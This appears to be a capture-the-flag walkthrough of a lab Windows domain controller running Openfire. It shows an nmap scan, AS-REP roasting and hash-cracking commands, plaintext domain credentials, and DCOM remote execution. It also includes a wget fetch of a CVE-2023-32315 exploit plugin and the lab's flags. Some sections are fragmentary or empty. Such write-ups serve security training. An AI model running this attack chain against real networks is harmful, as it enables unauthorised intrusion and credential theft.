Nmap Results
Show Nmap Scan Results
# Nmap 7.94SVN scan initiated Tue Feb 27 12:31:36 2024 as: nmap -Pn -p- --min-rate 2000 -A -oN nmap.txt 10.10.11.4
Nmap scan report for 10.10.11.4
Host is up (0.012s latency).
Not shown: 65503 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-02-27 17:32:00Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after: 2024-10-31T20:16:18
|_ssl-date: 2024-02-27T17:34:46+00:00; 0s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-02-27T17:34:45+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after: 2024-10-31T20:16:18
5222/tcp open jabber
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after: 2028-10-24T22:00:12
| fingerprint-strings:
| RPCCheck:
|_ <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
| xmpp-info:
| STARTTLS Failed
| info:
| unknown:
| errors:
| invalid-namespace
| (timeout)
| auth_mechanisms:
| compression_methods:
| features:
| stream_id: 2w1nsbkqd
| xmpp:
| version: 1.0
|_ capabilities:
|_ssl-date: TLS randomness does not represent time
5223/tcp open ssl/jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info:
| STARTTLS Failed
| info:
| errors:
| (timeout)
| auth_mechanisms:
| unknown:
| compression_methods:
| features:
| xmpp:
|_ capabilities:
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after: 2028-10-24T22:00:12
|_ssl-date: TLS randomness does not represent time
5262/tcp open jabber
| xmpp-info:
| STARTTLS Failed
| info:
| unknown:
| errors:
| invalid-namespace
| (timeout)
| auth_mechanisms:
| compression_methods:
| features:
| stream_id: 1luyjkdr8f
| xmpp:
| version: 1.0
|_ capabilities:
| fingerprint-strings:
| RPCCheck:
|_ <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
5263/tcp open ssl/jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info:
| STARTTLS Failed
| info:
| errors:
| (timeout)
| auth_mechanisms:
| unknown:
| compression_methods:
| features:
| xmpp:
|_ capabilities:
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after: 2028-10-24T22:00:12
|_ssl-date: TLS randomness does not represent time
5269/tcp open xmpp Wildfire XMPP Client
| xmpp-info:
| STARTTLS Failed
| info:
| errors:
| (timeout)
| auth_mechanisms:
| unknown:
| compression_methods:
| features:
| xmpp:
|_ capabilities:
5270/tcp open ssl/xmpp Wildfire XMPP Client
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after: 2028-10-24T22:00:12
5275/tcp open jabber
| fingerprint-strings:
| RPCCheck:
|_ <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
| xmpp-info:
| STARTTLS Failed
| info:
| unknown:
| errors:
| invalid-namespace
| (timeout)
| auth_mechanisms:
| compression_methods:
| features:
| stream_id: qj9t3bq52
| xmpp:
| version: 1.0
|_ capabilities:
5276/tcp open ssl/jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after: 2028-10-24T22:00:12
| xmpp-info:
| STARTTLS Failed
| info:
| errors:
| (timeout)
| auth_mechanisms:
| unknown:
| compression_methods:
| features:
| xmpp:
|_ capabilities:
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7070/tcp open realserver?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP:
| HTTP/1.1 400 Illegal character CNTL=0x0
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| GetRequest:
| HTTP/1.1 200 OK
| Date: Tue, 27 Feb 2024 17:32:00 GMT
| Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 223
| <html>
| <head><title>Openfire HTTP Binding Service</title></head>
| <body><font face="Arial, Helvetica"><b>Openfire <a href="http://www.xmpp.org/extensions/xep-0124.html">HTTP Binding</a> Service</b></font></body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Tue, 27 Feb 2024 17:32:05 GMT
| Allow: GET,HEAD,POST,OPTIONS
| Help:
| HTTP/1.1 400 No URI
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| RPCCheck:
| HTTP/1.1 400 Illegal character OTEXT=0x80
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 71
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
| RTSPRequest:
| HTTP/1.1 505 Unknown Version
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 58
| Connection: close
| <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
| SSLSessionReq:
| HTTP/1.1 400 Illegal character CNTL=0x16
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 70
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
7443/tcp open ssl/oracleas-https?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP:
| HTTP/1.1 400 Illegal character CNTL=0x0
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| GetRequest:
| HTTP/1.1 200 OK
| Date: Tue, 27 Feb 2024 17:32:06 GMT
| Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 223
| <html>
| <head><title>Openfire HTTP Binding Service</title></head>
| <body><font face="Arial, Helvetica"><b>Openfire <a href="http://www.xmpp.org/extensions/xep-0124.html">HTTP Binding</a> Service</b></font></body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Tue, 27 Feb 2024 17:32:11 GMT
| Allow: GET,HEAD,POST,OPTIONS
| Help:
| HTTP/1.1 400 No URI
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| RPCCheck:
| HTTP/1.1 400 Illegal character OTEXT=0x80
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 71
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
| RTSPRequest:
| HTTP/1.1 505 Unknown Version
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 58
| Connection: close
| <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
| SSLSessionReq:
| HTTP/1.1 400 Illegal character CNTL=0x16
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 70
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after: 2028-10-24T22:00:12
7777/tcp open socks5 (No authentication; connection not allowed by ruleset)
| socks-auth-info:
|_ No authentication
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-02-27T17:34:34
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
TRACEROUTE (using port 1723/tcp)
HOP RTT ADDRESS
1 13.23 ms 10.10.14.1
2 13.28 ms 10.10.11.4
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 27 12:34:47 2024 -- 1 IP address (1 host up) scanned in 191.67 seconds
We can see the references to DC01.jab.htb
and jab.htb
in the nmap
output. Let's go ahead and get those added to our /etc/hosts
file.
echo '10.10.11.4 DC01.jab.htb jab.htb' | sudo tee -a /etc/hosts
Service Enumeration
TCP/53
TCP/139,445
TCP/88
Let's see if we can enumerate any valid usernames using Kerberos pre-authentication requests.
impacket-GetNPUsers -usersfile as_rep_list.txt -outputfile as_rep_hashes.txt -no-pass -dc-ip 10.10.11.4 jab.htb/
TCP/5222
I'm not familiar with the steps needed to enumerate the Jabber attack surface, but looking at the nmap
output, it seems the Jabber (XMPP) server has bound to multiple ports including tcp/5223
, tcp/5262
, tcp/5263
, tcp/5275
, tcp/5276
, tcp/7070
, tcp/7443
.
Let's start by asking Google for some information.
Researching Jabber Enumeration
Connect with a Jabber Client
The article referenced above uses the pidgin
XMPP client, so that's what we'll use.
sudo apt install -y pidgin
Exporting the User List
There isn't a clear way of exporting the usernames from this user search function, so we'll have to get creative.
AS-REP Roast with the New List
impacket-GetNPUsers -usersfile jabber_as_rep.txt -outputfile as_rep_hashes.txt -no-pass -dc-ip 10.10.11.4 jab.htb/
john --wordlist=rockyou.txt as_rep_hashes.txt
Adding the Jabber Account
jmontgomery
credential and see who has access to what.TCP/3269
ldapdomaindump -u 'JAB.HTB\jmontgomery' -p 'Midnight_121' -o ldd ldaps://dc01.jab.htb:3269
open ldd/domain_users_by_group.html
# Check help output for usage
impacket-dcomexec -h
impacket-dcomexec -silentcommand -object MMC20 'jab.htb/svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' 'ping 10.10.14.181'
Exploit
DCOM Exec to Reverse Shell
Post-Exploit Enumeration
Operating Environment
OS & Kernel
WindowsBuildLabEx : 17763.1.x86fre.rs5_release.180914-1434
WindowsCurrentVersion : 6.3
WindowsEditionId : ServerStandard
WindowsInstallationType : Server
WindowsInstallDateFromRegistry : 1/1/1970 12:00:00 AM
WindowsProductId :
WindowsProductName : Windows Server 2019 Standard
WindowsRegisteredOrganization :
WindowsRegisteredOwner : Windows User
WindowsSystemRoot : C:\Windows
WindowsVersion : 1809
BiosCharacteristics :
BiosBIOSVersion :
BiosBuildNumber :
BiosCaption :
BiosCodeSet :
BiosCurrentLanguage :
BiosDescription :
BiosEmbeddedControllerMajorVersion :
BiosEmbeddedControllerMinorVersion :
BiosFirmwareType :
BiosIdentificationCode :
BiosInstallableLanguages :
BiosInstallDate :
BiosLanguageEdition :
BiosListOfLanguages :
BiosManufacturer :
BiosName :
BiosOtherTargetOS :
BiosPrimaryBIOS :
BiosReleaseDate :
BiosSeralNumber :
BiosSMBIOSBIOSVersion :
BiosSMBIOSMajorVersion :
BiosSMBIOSMinorVersion :
BiosSMBIOSPresent :
BiosSoftwareElementState :
BiosStatus :
BiosSystemBiosMajorVersion :
BiosSystemBiosMinorVersion :
BiosTargetOperatingSystem :
BiosVersion :
CsAdminPasswordStatus :
CsAutomaticManagedPagefile :
CsAutomaticResetBootOption :
CsAutomaticResetCapability :
CsBootOptionOnLimit :
CsBootOptionOnWatchDog :
CsBootROMSupported :
CsBootStatus :
CsBootupState :
CsCaption :
CsChassisBootupState :
CsChassisSKUNumber :
CsCurrentTimeZone :
CsDaylightInEffect :
CsDescription :
CsDNSHostName :
CsDomain :
CsDomainRole :
CsEnableDaylightSavingsTime :
CsFrontPanelResetStatus :
CsHypervisorPresent :
CsInfraredSupported :
CsInitialLoadInfo :
CsInstallDate :
CsKeyboardPasswordStatus :
CsLastLoadInfo :
CsManufacturer :
CsModel :
CsName :
CsNetworkAdapters :
CsNetworkServerModeEnabled :
CsNumberOfLogicalProcessors :
CsNumberOfProcessors :
CsProcessors :
CsOEMStringArray :
CsPartOfDomain :
CsPauseAfterReset :
CsPCSystemType :
CsPCSystemTypeEx :
CsPowerManagementCapabilities :
CsPowerManagementSupported :
CsPowerOnPasswordStatus :
CsPowerState :
CsPowerSupplyState :
CsPrimaryOwnerContact :
CsPrimaryOwnerName :
CsResetCapability :
CsResetCount :
CsResetLimit :
CsRoles :
CsStatus :
CsSupportContactDescription :
CsSystemFamily :
CsSystemSKUNumber :
CsSystemType :
CsThermalState :
CsTotalPhysicalMemory :
CsPhyicallyInstalledMemory :
CsUserName :
CsWakeUpType :
CsWorkgroup :
OsName :
OsType :
OsOperatingSystemSKU :
OsVersion :
OsCSDVersion :
OsBuildNumber :
OsHotFixes :
OsBootDevice :
OsSystemDevice :
OsSystemDirectory :
OsSystemDrive :
OsWindowsDirectory :
OsCountryCode :
OsCurrentTimeZone :
OsLocaleID :
OsLocale :
OsLocalDateTime :
OsLastBootUpTime :
OsUptime :
OsBuildType :
OsCodeSet :
OsDataExecutionPreventionAvailable :
OsDataExecutionPrevention32BitApplications :
OsDataExecutionPreventionDrivers :
OsDataExecutionPreventionSupportPolicy :
OsDebug :
OsDistributed :
OsEncryptionLevel :
OsForegroundApplicationBoost :
OsTotalVisibleMemorySize :
OsFreePhysicalMemory :
OsTotalVirtualMemorySize :
OsFreeVirtualMemory :
OsInUseVirtualMemory :
OsTotalSwapSpaceSize :
OsSizeStoredInPagingFiles :
OsFreeSpaceInPagingFiles :
OsPagingFiles :
OsHardwareAbstractionLayer :
OsInstallDate :
OsManufacturer :
OsMaxNumberOfProcesses :
OsMaxProcessMemorySize :
OsMuiLanguages :
OsNumberOfLicensedUsers :
OsNumberOfProcesses :
OsNumberOfUsers :
OsOrganization :
OsArchitecture :
OsLanguage :
OsProductSuites :
OsOtherTypeDescription :
OsPAEEnabled :
OsPortableOperatingSystem :
OsPrimary :
OsProductType :
OsRegisteredUser :
OsSerialNumber :
OsServicePackMajorVersion :
OsServicePackMinorVersion :
OsStatus :
OsSuites :
OsServerLevel :
KeyboardLayout :
TimeZone : (UTC-05:00) Eastern Time (US & Canada)
LogonServer :
PowerPlatformRole : Desktop
HyperVisorPresent :
HyperVRequirementDataExecutionPreventionAvailable :
HyperVRequirementSecondLevelAddressTranslation :
HyperVRequirementVirtualizationFirmwareEnabled :
HyperVRequirementVMMonitorModeExtensions :
DeviceGuardSmartStatus : Off
DeviceGuardRequiredSecurityProperties :
DeviceGuardAvailableSecurityProperties :
DeviceGuardSecurityServicesConfigured :
DeviceGuardSecurityServicesRunning :
DeviceGuardCodeIntegrityPolicyEnforcementStatus :
DeviceGuardUserModeCodeIntegrityPolicyEnforcementStatus :
Current User
USER INFORMATION
----------------
User Name SID
================ ============================================
jab\svc_openfire S-1-5-21-715914501-2118353807-243417633-1104
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Distributed COM Users Alias S-1-5-32-562 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Users and Groups
See ldapdomaindump
data.
Network Configurations
Network Interfaces
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.11.4
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : 10.10.10.2
Open Ports
127.0.0.1:9090 0.0.0.0:0 LISTENING 3192
127.0.0.1:9091 0.0.0.0:0 LISTENING 3192
Interesting Files
C:\Program Files\Openfire\conf\openfire.xml
<adminConsole>
<!-- Disable either port by setting the value to -1 -->
<port>9090</port>
<securePort>9091</securePort>
<interface>127.0.0.1</interface>
</adminConsole>
Privilege Escalation
In the post-exploit enumeration steps, we found a couple of ports listening internally on tcp/9090
and tcp/9091
and we can further see that it's associated with process ID 3076
. We can see these TCP ports referenced as the Openfire admin console ports in openfire.xml
.
Let's transfer chisel.exe
to the target, so we can forward those ports.
I just used the download_chisel
function referenced in my notes above to download both chisel
and chisel.exe
.
wget https://github.com/miko550/CVE-2023-32315/raw/main/openfire-management-tool-plugin.jar -O plugin.jar
Flags
User
cbe0287bba2a7a8b60575f9fbc09ee44
Root
97c1833cc7ea11ba52044b004bb51f1b